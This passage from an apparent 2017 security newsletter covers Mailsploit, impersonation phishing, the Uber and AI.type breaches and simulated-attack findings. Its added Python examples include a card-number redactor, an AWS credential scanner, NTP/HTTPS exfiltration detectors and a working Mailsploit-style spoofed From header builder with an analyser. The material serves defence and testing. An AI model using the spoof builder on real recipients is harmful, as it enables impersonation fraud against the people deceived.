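constructed and use the standard Visa test numbers."""
import logging
import re

# 13-19 digits, optionally separated by single spaces or hyphens, not glued
# to other digits. Candidates are confirmed with the Luhn check so ordinary
# numbers (order ids, timestamps) are left alone. Known limitation: a card
# number followed by another digit group after a single space can be
# swallowed into one over-long candidate that then fails Luhn; tighten the
# separators to match your log format.
PAN_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_valid(digits: str) -> bool:
    total = 0
    for index, char in enumerate(reversed(digits)):
        value = int(char)
        if index % 2 == 1:
            value *= 2
            if value > 9:
                value -= 9
        total += value
    return total % 10 == 0


def redact_pans(text: str) -> str:
    """Replace every Luhn-valid card number with asterisks, keeping the last
    four digits (the most PCI DSS permits to be displayed)."""
    def _replace(match):
        raw = match.group(0)
        digits = re.sub(r"[ -]", "", raw)
        if 13 <= len(digits) <= 19 and luhn_valid(digits):
            return "*" * (len(digits) - 4) + digits[-4:]
        return raw
    return PAN_CANDIDATE.sub(_replace, text)


class PanRedactingFilter(logging.Filter):
    """Attach to a handler so redaction happens before anything is written,
    regardless of which module produced the record."""

    def filter(self, record):
        record.msg = redact_pans(record.getMessage())
        record.args = ()
        return True


SAMPLE_LINES = [
    "2017-11-30T10:15:01Z pos-07 sale approved card=4111 1111 1111 1111 amount=49.99",
    "2017-11-30T10:15:04Z pos-07 txn 4012-8888-8888-1881 declined reason=insufficient",
    "2017-11-30T10:15:09Z pos-07 order 1234567890123 shipped to store 0042",
]

if __name__ == "__main__":
    handler = logging.StreamHandler()
    handler.addFilter(PanRedactingFilter())
    log = logging.getLogger("pos")
    log.addHandler(handler)
    log.setLevel(logging.INFO)
    for line in SAMPLE_LINES:
        log.info(line)
```

Redaction at the handler is a safety net, not a substitute for not logging the field at all; the filter exists for the third-party library or the hurried developer who logs a whole request.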

Other News


  • What to Expect in 2018 – With 2017 teaching us all new lessons about patch management, ransomware, cryptocurrencies and securing the cloud, 2018 is expected to provide a similar education. As more companies invest in the cloud and in new technologies, securing the modern business becomes harder; the Internet of Things, and the issues these devices have faced in the past, is a constant reminder of this. Financially motivated cybercrime is expected to remain a constant threat through social engineering and phishing, cryptocurrency-targeting malware and possibly more organisation-specific ransomware. On the defensive side, two-factor authentication (2FA) uptake is expected to increase significantly: many credential-based attacks are mitigated by enabling 2FA, and with 2FA now widely supported (especially by cloud and online services), 2018 should see a welcome increase in adoption. (10)

References

Information Security Report – December 2017

Threats and Exploits


Mailsploit

Mailsploit Allows Spoofed Mails to Fool DMARC. Mailsploit is a collection of vulnerabilities in various email clients that allow an attacker to spoof the displayed sender, and in some clients to inject code, bypassing protections such as DMARC (which builds on DKIM and SPF). The researcher who developed Mailsploit explained that the message is genuinely sent from a domain the attacker controls, so SPF, DKIM and DMARC all pass for that domain; the From header then uses encoded words (RFC 1342, now RFC 2047) containing null bytes or newlines, which vulnerable clients decode and truncate so that only the attacker's chosen address is displayed. It has been reported that most mail clients did not detect or block this technique at the time of disclosure.

All major email client and webmail vendors were notified about Mailsploit prior to its public release; however, a large number of popular clients still remained vulnerable at the time of writing.

The list of impacted mail clients is maintained at mailsploit.com.

Users should update their email client whenever an update is available, use end-to-end encrypted messaging for sensitive conversations at home and at work, and/or use PGP/GPG to verify sender identities and encrypt email contents.

You can read more on Mailsploit at Infosecurity Magazine and mailsploit.com
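The mechanism is easy to reproduce, and to test a gateway against. The Python below is an added example, not the researcher's code: it builds a From header in the shape described above (an RFC 2047 encoded word carrying the address the victim should see, terminated by a NUL byte, followed by the attacker's real domain in clear) and then analyses it the way a hardened client or gateway should, flagging control characters in the decoded header and a mismatch between the address a truncating client would display and the domain the header actually ends in. The victim.example and attacker.example addresses are constructed.

```python
"""Mailsploit-style From header: what the client decodes versus what the
mail actually came from. Added example, not the researcher's code. The
addresses are constructed; the header shape (an RFC 2047 encoded word ending
in a NUL byte, followed by the real domain in clear) is the technique the
report describes."""
import base64
import re
from email.header import decode_header

CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def build_spoofed_from(display_addr: str, real_domain: str) -> str:
    """Attacker side: the encoded word carries the address the victim should
    see plus a NUL; the real domain, which SPF/DKIM/DMARC evaluate and pass,
    follows in clear. Useful for testing your own client or gateway."""
    payload = base64.b64encode((display_addr + "\x00").encode("utf-8")).decode("ascii")
    return f"=?utf-8?b?{payload}?=@{real_domain}"


def decode_header_text(raw: str) -> str:
    """Decode every encoded word and join the pieces without inserting spaces,
    which is roughly what a display routine does before rendering."""
    pieces = []
    for chunk, charset in decode_header(raw):
        if isinstance(chunk, bytes):
            chunk = chunk.decode(charset or "ascii", errors="replace")
        pieces.append(chunk)
    return "".join(pieces)


def analyse_from(raw: str) -> dict:
    """Defender side: flag control characters in the decoded header and a
    mismatch between the address a truncating client would display and the
    domain the raw header actually ends in."""
    decoded = decode_header_text(raw)
    has_control = bool(CONTROL_CHARS.search(decoded))
    truncated = decoded.split("\x00", 1)[0]          # what a NUL-truncating client shows
    lines = truncated.splitlines()                    # what a newline-truncating client shows
    naive_display = (lines[0] if lines else "").strip(" <>")
    routing_domain = raw.rsplit("@", 1)[-1].strip(" <>").lower()
    display_domain = naive_display.rsplit("@", 1)[-1].lower() if "@" in naive_display else None
    return {
        "decoded": decoded,
        "control_chars": has_control,
        "naive_display": naive_display,
        "routing_domain": routing_domain,
        "spoof_suspected": has_control
        or (display_domain is not None and display_domain != routing_domain),
    }


if __name__ == "__main__":
    spoofed = build_spoofed_from("ceo@victim.example", "attacker.example")
    print(spoofed)
    print(analyse_from(spoofed))
    print(analyse_from("Alice <alice@example.com>"))
```

A gateway that applies the same two checks (reject control characters after decoding, and compare the decoded address domain with the raw header's domain) catches the technique without needing a list of affected clients, which is the point: DMARC was never violated, so only the client-side rendering was lying.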

Spear Phishing

Huge Increase in Email Impersonation Attacks: According to the Email Security Risk Assessment (ESRA) report released by Mimecast, organisations continue to face an ongoing threat from malware, but the fastest-growing threat is impersonation attacks: an organisation is seven times more likely to be hit by an impersonation attack than by email-borne malware. These attacks, also known as business email compromise, whaling or spear phishing, trick recipients into wiring money to the fraudster. They are highly targeted and usually follow reconnaissance, so that the right person receives the right message. They continue to grow faster than malware because they carry no malicious attachment or link for traditional defences such as email filters to detect.

Good user training gives an edge in avoiding most payment and impersonation scams. A few other measures security teams can take against the social-engineering threat include:

  • Running internal phishing simulations against your own employees and sharing the results with them so they learn what to look out for, combined with training on how to recognise phishing emails.
  • Impersonation attacks often mimic emails from C-level executives. Implement company policies that close the avenues would-be spear phishers rely on (for example, never request payments or sensitive documents by email alone, and verify any change of payment details out of band).
  • Disable links in email bodies so that users must navigate to the site manually. It adds extra steps, but it prevents a user from clicking a phishing link by accident.

Read more on Infosecurity Magazine and TechRepublic

 


Breaches


Virtual Keyboard App Data Breach

Massive Breach Exposes Keyboard App that Collects Personal Data on 31 Million Users. A team of security researchers discovered a huge trove of personal data belonging to users of the virtual keyboard app ‘AI.type’ that had been accidentally left online for anyone to download. The app customises the on-screen keyboard on phones and tablets and has more than 40 million users worldwide. It is reported that the app requests ‘full access’ to all user data stored on the phone and appears to collect everything from contacts to keystrokes. The leaked data includes full names, phone numbers, email addresses, device information (device name, screen resolution, model, Android version and mobile network name), country of residence, GPS location and even links to and information from social media profiles.

Events such as this raise the question of what permissions mobile applications hold on our devices, and how much access they actually need. The best protection against this form of application privilege abuse is to read and be cautious about the access granted to each application: a keyboard has no need for contacts or location, and both Android and iOS let you revoke individual permissions after installation.

Read more on The Hacker News

Uber Technologies Data Breach

Personal data of 57 million customers and drivers was stolen from ride-sharing company Uber in 2016, and the breach was concealed by the company for more than a year. It is suggested that the company paid the attackers $100,000. The company advised that no Social Security numbers, credit card information, trip location details or other data were taken. Uber has been condemned for how it chose to deal with the incident after discovering the attack, and has been sued for negligence over the breach by a customer.

It is reported that two attackers retrieved login credentials from a private GitHub repository used by Uber engineers and used them to access an Amazon Web Services account, where they found the customer and driver data. Although state and federal laws in the United States require companies to notify affected people and government agencies when breaches of sensitive data occur, Uber failed to comply.
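Credentials committed to a repository are the root cause reported here, and they are cheap to look for before a commit lands. As an added example, not the page's own code and unrelated to anything Uber ran, the following scan looks for AWS access key IDs and secret keys in a set of files. The files are constructed; AKIAIOSFODNN7EXAMPLE and the secret next to it are the placeholder values from AWS's own documentation, and the entropy threshold is an assumption.

```python
import math
import re
from collections import Counter

# AWS access key IDs are 20 characters starting with AKIA (long-term) or ASIA (temporary).
ACCESS_KEY_RE = re.compile(r"(?<![A-Z0-9])(?:AKIA|ASIA)[A-Z0-9]{16}(?![A-Z0-9])")
# A 40-character base64-style value assigned to something named like an AWS secret key.
SECRET_KEY_RE = re.compile(
    r"(?i)aws\w*secret\w*\s*[:=]\s*['\"]?([A-Za-z0-9/+=]{40})(?![A-Za-z0-9/+=])"
)
MIN_SECRET_ENTROPY = 3.5  # assumption: bits per character; placeholders score far lower


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for empty input)."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan_text(path, text):
    """Return (path, line_no, kind, value) for each credential found in text."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for m in ACCESS_KEY_RE.finditer(line):
            findings.append((path, line_no, "aws_access_key_id", m.group(0)))
        for m in SECRET_KEY_RE.finditer(line):
            candidate = m.group(1)
            # Placeholders such as forty 'A's have near-zero entropy; real keys do not.
            if shannon_entropy(candidate) >= MIN_SECRET_ENTROPY:
                findings.append((path, line_no, "aws_secret_access_key", candidate))
    return findings


def scan_files(files):
    """Scan a {path: contents} mapping, e.g. the files staged for a commit."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_text(path, text))
    return findings


# Constructed sample files; the key values are AWS's documented placeholders.
SAMPLE_FILES = {
    "config/prod.yml": (
        "region: us-east-1\n"
        "aws_access_key_id: AKIAIOSFODNN7EXAMPLE\n"
        "aws_secret_access_key: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
    ),
    "docs/example.env": (
        "AWS_ACCESS_KEY_ID=AKIA<your-key-id>\n"
        "AWS_SECRET_ACCESS_KEY=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
    ),
    "README.md": "Use `aws configure` with your own credentials; never commit them.\n",
}


if __name__ == "__main__":
    for path, line_no, kind, value in scan_files(SAMPLE_FILES):
        print(f"{path}:{line_no}: {kind} = {value[:8]}...")
```

Wired into a pre-commit hook this stops new keys entering history; a key that has already been pushed must be treated as compromised and rotated, because removing it from the current tree does not remove it from the repository's history.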

Read more on Bloomberg.com

TIO Networks (PayPal Subsidiary) Data Breach

Breach at PayPal Subsidiary Affects 1.6 Million Customers. PayPal disclosed on 1 December 2017 a data breach at TIO Networks, a company it had recently acquired. Personal information for 1.6 million individuals may have been compromised. TIO is based in Canada and serves some of the largest telecom and utility network operators in North America. PayPal pointed out that the PayPal platform was not affected, as TIO's systems have not been integrated into it. PayPal advised that affected companies and individuals would be contacted by mail and email and offered free credit monitoring via Experian. The breach was discovered during an ongoing review to identify vulnerabilities in TIO's processing platform.

Read more on SecurityWeek.com

Other News


Simulated Attacks Uncover Real-World Problems in IT Security. A research report by SafeBreach, a cybersecurity company whose platform simulates the breach methods attackers use, reveals that its virtual hackers “have a 60% success rate of using malware to infiltrate networks. And once in, the malware could move laterally almost 70% of the time. In half the cases, they could exit networks with data.” The research found that getting past the perimeter was not hard and that, once inside, attackers could move around and exfiltrate data easily, because most organisations focus on the perimeter and overlook lateral movement.

According to the report, infiltration methods such as nesting or “packing” malware executables bypassed security controls about 50% of the time, and packed executables delivered as JavaScript, as VBScript (VBS) over HTTP, or inside Compiled HTML Help (CHM) files succeeded 55%-61% of the time. It is recommended that network security controls be configured to scan for malicious files and block them before they reach the endpoints and are written to disk. The report further outlines how attackers exfiltrate data using the easiest methods available, most often ordinary clear-text or encrypted web traffic. The ports with the highest exfiltration success rates include port 443 (HTTPS) and port 123 (NTP).

It is recommended that, to better protect resources, organisations optimise the security solutions they already have, update their configurations as the environment changes, and then test those changes, for example by re-running the same simulated attacks.
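As an added example, not from the SafeBreach report, here is the kind of check a SOC can run over flow records to catch the two exfiltration channels the report names. Port 123 is the easier one: a genuine NTP client/server packet carries a fixed 48-byte payload (RFC 5905), so "NTP" flows averaging kilobytes per packet are not NTP. Port 443 offers no such structure, so the only signal is an unusual volume of outbound data per source/destination pair. The flow records and both thresholds are constructed for this example.

```python
from collections import defaultdict

# Constructed flow records: (src, dst, dst_port, proto, bytes_out, packets_out).
FLOWS = [
    ("10.0.0.5", "203.0.113.10", 123, "udp", 180, 2),            # two ordinary NTP polls
    ("10.0.0.7", "198.51.100.20", 123, "udp", 1_440_000, 1200),  # 1.2 KB per "NTP" packet
    ("10.0.0.8", "203.0.113.10", 123, "udp", 90, 1),
    ("10.0.0.9", "198.51.100.30", 443, "tcp", 150_000_000, 110_000),
    ("10.0.0.9", "198.51.100.30", 443, "tcp", 100_000_000, 75_000),
    ("10.0.0.9", "203.0.113.50", 443, "tcp", 4_000, 30),
]

# An NTP packet is 48 bytes of payload, roughly 76 bytes on the wire with IPv4/UDP
# headers. The limit below is an assumption that leaves room for extension fields
# and a MAC while still rejecting anything that is really a data channel.
NTP_MAX_BYTES_PER_PACKET = 256
# Assumption: 200 MiB outbound to one destination within the record window.
HTTPS_UPLOAD_THRESHOLD = 200 * 1024 * 1024


def ntp_findings(flows, max_bytes=NTP_MAX_BYTES_PER_PACKET):
    """Port 123 flows whose average bytes per packet cannot be genuine NTP."""
    out = []
    for src, dst, port, proto, nbytes, pkts in flows:
        if port == 123 and proto == "udp" and pkts > 0:
            avg = nbytes / pkts
            if avg > max_bytes:
                out.append((src, dst, round(avg)))
    return out


def https_findings(flows, threshold=HTTPS_UPLOAD_THRESHOLD):
    """(src, dst, total_bytes) pairs whose outbound HTTPS volume exceeds threshold."""
    totals = defaultdict(int)
    for src, dst, port, proto, nbytes, pkts in flows:
        if port == 443 and proto == "tcp":
            totals[(src, dst)] += nbytes
    return sorted(
        (src, dst, total) for (src, dst), total in totals.items() if total > threshold
    )


def exfil_report(flows=FLOWS):
    """Run both checks over a set of flow records."""
    return {"ntp": ntp_findings(flows), "https": https_findings(flows)}


if __name__ == "__main__":
    for channel, hits in exfil_report().items():
        print(channel, hits or "nothing flagged")
```

The NTP rule is precise enough to alert on directly; the HTTPS volume rule only ranks candidates, and the threshold has to be tuned per environment (backup jobs and cloud uploads will exceed it) before it is worth an analyst's time.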

Read more on DARKReading.com